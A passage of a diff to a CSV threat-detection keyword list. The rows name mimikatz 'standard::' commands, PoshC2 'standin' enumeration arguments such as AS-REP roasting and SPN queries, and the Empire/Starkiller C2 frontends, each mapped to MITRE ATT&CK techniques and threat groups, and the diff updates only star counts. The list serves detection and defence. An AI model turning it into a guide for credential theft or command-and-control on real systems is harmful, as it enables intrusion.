a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*standard::answer*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::base64*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::cd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::cls*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::coffee*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::exit*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::hostname*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::localtime*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::log*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::sleep*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standard::version*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*standin --asrep*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*standin --dc*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*standin --delegation*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*standin --group *Domain Admins*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 
- T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*standin --object *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*standin --spn*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standard::answer*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::base64*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::cd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::cls*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::coffee*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::exit*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::hostname*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::localtime*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::log*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::sleep*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::version*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standin --asrep*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --dc*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin 
--delegation*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --group *Domain Admins*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --object *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 
- TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --spn*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*StarFighters*","offensive_tool_keyword","StarFighters","A JavaScript and VBScript Based Empire Launcher - by Cn33liz 2017","T1059 - T1055 - T1218 - T1027","TA0002 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/StarFighters","1","0","N/A","N/A","4","320","66","2017-06-05T19:18:38Z","2017-06-05T18:28:22Z" "*Starkiller*","offensive_tool_keyword","Starkiller","Starkiller is a Frontend for Powershell Empire. It is an Electron application written in VueJS. If you'd like to contribute please follow the Contribution guide. If you'd like to request a feature or report a bug. please follow the Issue template.","T1105 - T1210 - T1059 - T1027 - T1035","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","C2","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","10","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" "*StarkillerSnackbar.vue*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. 
It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 